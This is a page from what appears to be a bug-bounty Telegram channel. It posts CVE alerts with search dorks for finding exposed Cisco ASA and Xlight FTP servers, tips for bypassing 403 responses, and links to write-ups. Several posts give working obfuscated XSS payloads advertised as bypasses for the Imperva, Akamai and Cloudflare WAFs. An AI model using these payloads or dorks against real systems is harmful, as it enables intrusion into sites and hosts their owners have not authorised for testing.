NEW BOT Телеграм, страница

80% bug bounties is about understanding the application/framework/protocol and (knowing about what exactly are you doing or if it's actually worth doing)

👍29🔥4🗿3❤1

5.08K viewsMr Rahim, 11:49

Brut Security

CVE-2024-20329: Improper Neutralization of Command Delimiters in Cisco ASA, 9.9 rating 🔥🔥🔥

The vulnerability allows an attacker with low privileges to remotely execute commands via SSH and thus gain full control of the system.

More then 140k instances at Netlas.io:
👉 Link: https://nt.ls/Rfjme
👉 Dork: http.body:"/+CSCOE+/logon.html"

Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF

❤3🗿2👍1

4.73K viewsMr Brut, 10:25

Brut Security

Happy Sunday 🫶

🗿22🔥4❤2👍1

3.72K viewsMr Brut, 05:13

Brut Security

3.41K viewsMr Brut, 12:13

Brut Security

🕷

Bypass 403 Forbidden with HTTP Headers Fuzzing

⬇️

HTTP Headers List (Don’t forget to give it a star! ⭐️)

📱

GitHub

Please open Telegram to view this post

VIEW IN TELEGRAM

Gist

I’ve analyzed numerous tools, blogs, tweets, and other resources on bypassing 403 Forbidden errors using HTTP Headers Fuzzing techniques.…

I’ve analyzed numerous tools, blogs, tweets, and other resources on bypassing 403 Forbidden errors using HTTP Headers Fuzzing techniques. After extensive research, I’ve compiled a list of headers y...

1❤12👍3🗿1

3.86K viewsMr Brut, 12:13

Brut Security

Wordpress juicy endpoints #bugbountytips

1👍9

3.46K viewsMr Brut, 18:46

Brut Security

⚡️Found a security vulnerability in any site?
✅Check if it has a public bug bounty program:

https://xplo1t-sec.github.io/bugbounty-lookup/

#BugBounty #bugbountytips

1❤6🔥3🐳1

3.62K viewsMr Brut, 18:50

Brut Security

A solid XSS payload that bypasses Imperva WAF ⚙️

<a/href="j%0A%0Davanoscript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

#infosec #cybersec #bugbountytips

1🔥9🐳3

3.83K viewsMr Brut, 19:31

Brut Security

Reflected XSS Akami Waf Bypass in Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:⚙️

/login?ReturnUrl=javanoscript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529

1🔥5👍4🐳2

4.02K viewsMr Brut, 19:31

Brut Security

Cloudflare #XSS WAF Bypass by @nav1n0x

Payload:

"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F

#cybersec #bugbountytips #infosec

1👍10🗿3🐳1

4.1K viewsMr Brut, 19:38

Brut Security

an XSS payload to bypass some waf & filters in Firefox

<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">

#infosec #cybersec #bugbountytips

1❤9

3.62K viewsMr Brut, 09:22

Brut Security

Retrieves DNS records without any authentication

curl -s "https://api.hackertarget.com/dnslookup/?q=example.com"

Replace example.com with the target domain.

26🗿12❤7👍2

3.82K viewsMr Brut, edited 09:23

Brut Security

Brut Security pinned «🚨If you're looking for accurate IoT results, then Sign Up On @Netlas 😮‍💨https://app.netlas.io/ref/9cc61538/»

09:24

Brut Security

1)Finding a Hidden GraphQL Endpoint
https://medium.com/@codingbolt.in/finding-a-hidden-graphql-endpoint-56001ab29f85

2)My 2nd bounty : Referer-based access control + Response manipulation
https://medium.com/@adebayosec/my-2nd-bounty-referer-based-access-control-response-manipulation-2ab7f54d083f

3)CSRF Bypass Using Domain Confusion Leads To ATO
https://infosecwriteups.com/csrf-bypass-using-domain-confusion-leads-to-ato-ac682dd17722

4)Linear-feedback. Shift. Register
https://cyancharley.medium.com/linear-feedback-shift-register-ac6fc3298c35

5)ASCWG Reverse Engineering challenges
https://s3dny.medium.com/ascwg-reverse-engineering-challenges-778e47a5be80

6)picoCTF: No SQL Injection
https://medium.com/@baracarlo/picoctf-no-sql-injection-93a253cc4d09

7)Sunset:1 Walkthrough
https://medium.com/@nikhilbwr34/sunset-1-walkthrough-d124d06fcc93

8)Gixposed is a powerful command-line tool designed to search the commit history of Git repositories for sensitive information, such as API keys and access tokens
https://github.com/WH1T3-E4GL3/gixposed

9)MM-ReverseIPLookup created to take a domain name and find all (A) records associated with an IP address Using Free Multiple sources,
https://github.com/FINAL094/MM-ReverseIPLookup

10)Hidden secrets and urls in JS Mass hunting || Bug bounty POC
https://www.youtube.com/watch?v=HAAG5_mSxdk

Medium

Finding a Hidden GraphQL Endpoint

GraphQL Vulnerability

👍7❤2

3.69K viewsMr Brut, 10:33

Brut Security

CVE-2024-46483: Integer Overflow in Xlight FTP Server, 9.8 rating 🔥

By overflowing the variable, an attacker could cause remote code execution on the host or a denial of service.

Search at Netlas.io:
👉 Link: https://nt.ls/M8D2R
👉 Dork: \*.banner:"Xlight" OR raw_tcp.response_data:"Xlight"

Read more: https://github.com/kn32/cve-2024-46483

👍3❤2

3.39K viewsMr Brut, 12:17

Brut Security

⚡️Parameter that could be vulnerable to server side request forgery !

❤13👍3

3.16K viewsMr Brut, 08:08

Brut Security

Pre-Auth RCE CyberPanel 0day by Chirag Artani 🔥

Useful video from our friend's channel about one of the freshest big vulnerabilities with Netlas search 🔎

We also recommend checking out his website and Twitter for more tips:

👉 Site: 3rag.com
👉 Twitter: x.com/Chirag99Artani

YouTube

Pre-Auth Remote Code Execution CyberPanel 0day | Live Recon Using Netlas

CyberPanel v2.3.6 has a critical vulnerability that allows remote attackers to execute arbitrary commands on the server without prior authentication.

Impact: Attackers can exploit this vulnerability by crafting malicious requests that bypass authentication…

🔥4❤3👍1

3.03K viewsMr Brut, 15:49

About

Blog

Apps

Platform